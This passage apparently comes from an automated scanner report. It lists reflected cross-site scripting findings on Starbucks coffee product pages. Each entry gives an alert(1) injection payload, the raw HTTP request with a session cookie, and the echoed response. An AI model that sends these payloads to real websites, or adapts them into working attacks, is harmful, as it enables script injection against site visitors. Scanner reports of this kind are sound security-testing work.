Path:   /coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26c27"%3balert(1)//b005536df9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 26c27";alert(1)//b005536df9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia?26c27"%3balert(1)//b005536df9f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:18:06 GMT
Connection: close
Content-Length: 40941

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
= {};
       flashvars.playerType = "reserve";
       flashvars.playlistID = "679100977001";
       flashvars.playerLocation = "http://www.starbucks.com/coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia?26c27";alert(1)//b005536df9f=1";
       var params = {};
       params.loop = "false";
       params.quality = "best";
       params.scale = "exactfit";
       params.wmode = "transparent";
       params.allowscriptaccess = "always";
       params.allownetw
...[SNIP]...

2.38. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-blue-java [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/organic-blue-java

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51c23"%3balert(1)//aabb77efc8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 51c23";alert(1)//aabb77efc8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/starbucks-reserve-coffee/organic-blue-java?51c23"%3balert(1)//aabb77efc8a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:49 GMT
Connection: close
Content-Length: 40986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
flashvars = {};
       flashvars.playerType = "reserve";
       flashvars.playlistID = "731783176001";
       flashvars.playerLocation = "http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-blue-java?51c23";alert(1)//aabb77efc8a=1";
       var params = {};
       params.loop = "false";
       params.quality = "best";
       params.scale = "exactfit";
       params.wmode = "transparent";
       params.allowscriptaccess = "always";
       params.allownetw
...[SNIP]...

2.39. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-blue-java [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/organic-blue-java

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2056f"style%3d"x%3aexpression(alert(1))"74970e702cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2056f"style="x:expression(alert(1))"74970e702cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-reserve-coffee/organic-blue-java?2056f"style%3d"x%3aexpression(alert(1))"74970e702cd=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:48 GMT
Connection: close
Content-Length: 41081

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-blue-java?2056f"style="x:expression(alert(1))"74970e702cd=1" />
...[SNIP]...

2.40. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-peru-tingo-maria [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/organic-peru-tingo-maria

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62e73"style%3d"x%3aexpression(alert(1))"e0a45db438b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62e73"style="x:expression(alert(1))"e0a45db438b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-reserve-coffee/organic-peru-tingo-maria?62e73"style%3d"x%3aexpression(alert(1))"e0a45db438b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:34 GMT
Connection: close
Content-Length: 40877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-peru-tingo-maria?62e73"style="x:expression(alert(1))"e0a45db438b=1" />
...[SNIP]...

2.41. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-peru-tingo-maria [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/organic-peru-tingo-maria

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ac74"%3balert(1)//93e8ea141e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5ac74";alert(1)//93e8ea141e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/starbucks-reserve-coffee/organic-peru-tingo-maria?5ac74"%3balert(1)//93e8ea141e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:37 GMT
Connection: close
Content-Length: 40777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
rs = {};
       flashvars.playerType = "reserve";
       flashvars.playlistID = "735248429001";
       flashvars.playerLocation = "http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-peru-tingo-maria?5ac74";alert(1)//93e8ea141e=1";
       var params = {};
       params.loop = "false";
       params.quality = "best";
       params.scale = "exactfit";
       params.wmode = "transparent";
       params.allowscriptaccess = "always";
       params.allownetw
...[SNIP]...

2.42. http://www.starbucks.com/coffee/via [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46d0d"style%3d"x%3aexpression(alert(1))"aec8401d6e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 46d0d"style="x:expression(alert(1))"aec8401d6e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/via?46d0d"style%3d"x%3aexpression(alert(1))"aec8401d6e5=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:16:48 GMT
Connection: close
Content-Length: 50393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/via?46d0d"style="x:expression(alert(1))"aec8401d6e5=1" />
...[SNIP]...

2.43. http://www.starbucks.com/coffee/via [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c836e"%3balert(1)//ea1e4924121 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c836e";alert(1)//ea1e4924121 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/via?c836e"%3balert(1)//ea1e4924121=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:16:54 GMT
Connection: close
Content-Length: 50298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
"text/javascript">
   var flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "620273805001";
   flashvars.playerLocation = "http://www.starbucks.com/coffee/via?c836e";alert(1)//ea1e4924121=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.44. http://www.starbucks.com/coffee/via/flavored-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via/flavored-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb780"style%3d"x%3aexpression(alert(1))"017ad330597 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bb780"style="x:expression(alert(1))"017ad330597 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/via/flavored-coffee?bb780"style%3d"x%3aexpression(alert(1))"017ad330597=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:01 GMT
Connection: close
Content-Length: 50326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/via/flavored-coffee?bb780"style="x:expression(alert(1))"017ad330597=1" />
...[SNIP]...

2.45. http://www.starbucks.com/coffee/via/instant-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via/instant-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47b90"style%3d"x%3aexpression(alert(1))"6c41d8ffcf1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 47b90"style="x:expression(alert(1))"6c41d8ffcf1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/via/instant-coffee?47b90"style%3d"x%3aexpression(alert(1))"6c41d8ffcf1=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:06 GMT
Connection: close
Content-Length: 50600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/via/instant-coffee?47b90"style="x:expression(alert(1))"6c41d8ffcf1=1" />
...[SNIP]...

2.46. http://www.starbucks.com/coffee/whole-bean-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70376"style%3d"x%3aexpression(alert(1))"4e8579796e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 70376"style="x:expression(alert(1))"4e8579796e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee?70376"style%3d"x%3aexpression(alert(1))"4e8579796e6=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:16:10 GMT
Connection: close
Content-Length: 50980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee?70376"style="x:expression(alert(1))"4e8579796e6=1" />
...[SNIP]...

2.47. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/africa-arabia

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4774c"style%3d"x%3aexpression(alert(1))"403ec5c4484 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4774c"style="x:expression(alert(1))"403ec5c4484 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/africa-arabia?4774c"style%3d"x%3aexpression(alert(1))"403ec5c4484=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:14:38 GMT
Connection: close
Content-Length: 42063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia?4774c"style="x:expression(alert(1))"403ec5c4484=1" />
...[SNIP]...

2.48. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/africa-arabia

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c4da"%3balert(1)//dbdcde42a66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2c4da";alert(1)//dbdcde42a66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/whole-bean-coffee/africa-arabia?2c4da"%3balert(1)//dbdcde42a66=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:14:41 GMT
Connection: close
Content-Length: 41968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "643101032001";
   flashvars.playerLocation = "http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia?2c4da";alert(1)//dbdcde42a66=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

2.49. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/asia-pacific

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f4f8"style%3d"x%3aexpression(alert(1))"3b6680e832f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f4f8"style="x:expression(alert(1))"3b6680e832f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/asia-pacific?6f4f8"style%3d"x%3aexpression(alert(1))"3b6680e832f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:14:47 GMT
Connection: close
Content-Length: 41482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific?6f4f8"style="x:expression(alert(1))"3b6680e832f=1" />
...[SNIP]...

2.50. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/asia-pacific

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60e4f"%3balert(1)//ccc1047f29b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 60e4f";alert(1)//ccc1047f29b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/whole-bean-coffee/asia-pacific?60e4f"%3balert(1)//ccc1047f29b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:14:53 GMT
Connection: close
Content-Length: 41387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
r flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "643064965001";
